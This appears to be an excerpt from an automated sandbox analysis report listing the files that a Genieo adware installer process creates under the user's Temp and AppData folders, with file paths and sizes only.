C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\UninstallManager.exe (59286 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\lpd#4.3.0.xpi (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\1[1].zip (296615 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\MessageBox.xml (3 bytes)
The process trayapp_setup.gen:1992 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\x_white.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack4.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\miniview.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_ui.js (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\buttonBg.png (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_bird.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_data.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack1sm.png (769 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\GenieoPartnerWindow.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame1sm.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieo_logo2.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\red.gif (801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\js\main.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\splash_bg.jpg (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cluster_default1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\tpl\settings.tpl (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\button.png (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\notification.html (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\warming_up.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\opera_extension.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\notification_controls.png (441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_8.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\Preferences.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extOpera1.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\big_image_frame.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frameSm.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_8sm.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_fr.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tryAgainButton.png (710 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\fr.css (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\miniview.html (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvAF24.tmp (82165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\page_arrows_blue.png (277 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_inner_ru.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\heart.png (658 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\ServerConnector.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cmd_close_red.gif (840 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieoRss.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\notification.html (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\buttonSp.png (837 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\partner_item_bg.gif (879 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\default_image.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\.project (487 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\set_full_view_btn.png (536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\previewPublish.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\birthday.css (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariWin1.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\button.png (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\title.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\prototype.jsonp.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\okCancelButton.png (734 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\ad_no_image.png (876 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cluster_default.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\notification_popup_bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\bummer.png (750 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFirefoxMac3.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\hotItemIcon.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\happy.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_6.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\social_icons.png (893 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\redSqSm.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extChromeMac1.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitterButton.png (955 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\h_bg.png (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_ru.properties (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\attention.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\settings.html (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\favorite_site_mask.png (176 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\aggregation.html (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\x.gif (828 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\all-genieo-sp-pack.js (15168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\share_btn.png (625 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\big_quote.gif (203 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\message_note.png (696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\DataProcessor.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-overcast.png (975 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFirefoxMac1.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\page_arrows.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\ohBg.gif (879 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\layer.html (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\prog_bar_prog.gif (166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\upper_border.gif (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-clear-night.png (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\follow_facebook_btn.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\splash_video_bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_ru.json (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\round_corners_5px.png (182 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sendFeedbackButton.jpg (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_4.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\prog_bar_prog.gif (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie8.css (745 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\item_bg.png (264 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\picFrames.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_application.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\template1.html (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\slideshow.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\constants.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\share_btn.png (553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\pagelet.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\browser_not_supported.html (125 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\smallGrey.gif (803 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\covers.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack2.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\footer_bg.png (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\older_items_arrow.gif (49 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sidebar_text_ad_bg.png (564 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\arrow_down.gif (68 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFinishButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\analytics.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\itemsRotate.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template1_.jpg (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\rssButton.png (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template3sm.jpg (7192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\hp_guard.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\grad.png (171 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\template2.html (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\google_search_btn.png (166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sad.png (971 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\login_facebook_btn.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\jquery.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\bug.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\json.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack3sm.png (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_next2.gif (90 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\logDbgLoadPhase.js (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\social_connector.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-few-clouds-night.png (965 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tw.gif (241 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\bg.jpg (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\x.gif (828 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\set_to_miniview.png (203 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\grey.gif (817 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\js\utils.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\message_heart.png (765 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_3.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\fbButton.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\share_popup_arrow.png (219 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\personalization_meter_bg.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\utils.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template1.jpg (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\Activators.js (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\noitems.html (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\followbutton.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\logo_icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\orig\field_fr.properties (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\icons\thumb_up.png (697 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\splash.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\default_image.jpg (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\js\classes.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\signUpButton.png (863 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_main.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\birthday_not_connected_bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\warning.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\pagging_arrows.png (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\icons\bug.png (682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\LocationManager.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification_ui.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\birthday_cake.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\small_arrow_down.png (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\share_unfollow.png (849 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariMac.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_5.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\prog_bar.gif (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\settings\buttonSp.png (837 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\topic_x.png (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie7.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\facebook_twitter.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\welcome_home.gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\dialogWarning.png (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\core.html (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\google_search_input_logo.png (903 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\follow_twitter_btn.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\message_note.png (696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weatherimg.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_ru.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\trayapp_uninstall.exe (825 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ru.css (630 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\ok.png (769 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\x_small.png (832 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\css\main.css (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-severe-alert.png (977 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\birthday.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\rss.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template2.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\white.gif (965 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\social_baloon_tip.png (158 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\shadowv.png (939 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extNextButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-snow.png (998 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\class.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\syncOnButton.png (566 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\body_bg.png (323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\box_controls.png (814 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_en.json (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\UIState.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\redirect_handler.html (796 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\counter_bg.png (270 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\previewShareDisabled.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\js\collage.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\counter_bg.png (270 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack5.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\big_video_frame.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame3.png (587 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\redSq.png (136 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_white.png (217 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-storm.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\css\partner.css (930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_10.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\splash_video.jpg (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\css\notify.css (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\hotItemIcon.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\ajax-loader.gif (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\default.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\orig\field_ru.properties (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieo_logo_small.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_gray_transparent.png (198 bytes)
